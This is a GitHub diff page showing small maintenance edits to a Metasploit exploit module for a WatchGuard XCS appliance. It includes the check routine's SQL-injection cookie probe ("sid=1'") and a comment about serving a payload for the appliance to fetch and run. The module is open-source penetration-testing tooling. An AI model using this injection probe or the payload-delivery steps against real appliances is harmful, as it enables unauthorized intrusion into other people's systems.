File tree Expand file tree Collapse file tree 1 file changed +7
-3
lines changed
modules/exploits/freebsd/http Expand file tree Collapse file tree 1 file changed +7
-3
lines changed Original file line number Diff line number Diff line change @@ -31,7 +31,7 @@ def initialize(info = {})
31
31
'License' => MSF_LICENSE ,
32
32
'References' =>
33
33
[
34
- [ 'URL' , 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf' ]
34
+ [ 'URL' , 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf' ]
35
35
] ,
36
36
'Platform' => 'bsd' ,
37
37
'Arch' => ARCH_X86_64 ,
@@ -68,7 +68,7 @@ def check
68
68
'cookie' => "sid=1'"
69
69
} )
70
70
71
- if res and res . body =~ / unterminated quoted string/
71
+ if res && res . body && res . body . include? ( ' unterminated quoted string' )
72
72
return Exploit ::CheckCode ::Vulnerable
73
73
end
74
74
@@ -89,9 +89,13 @@ def exploit
89
89
#We have cmd exec, stand up an HTTP server and deliver the payload
90
90
vprint_status ( 'Getting ready to drop binary on appliance' )
91
91
92
+ @elf_sent = false
92
93
#Generate payload
93
94
@pl = generate_payload_exe
94
- @elf_sent = false
95
+
96
+ if @pl . nil?
97
+ fail_with ( Failure ::BadConfig , 'Please select a native bsd payload' )
98
+ end
95
99
96
100
#Start the server and use primer to trigger fetching and running of the payload
97
101
begin
You can’t perform that action at this time.
0 commit comments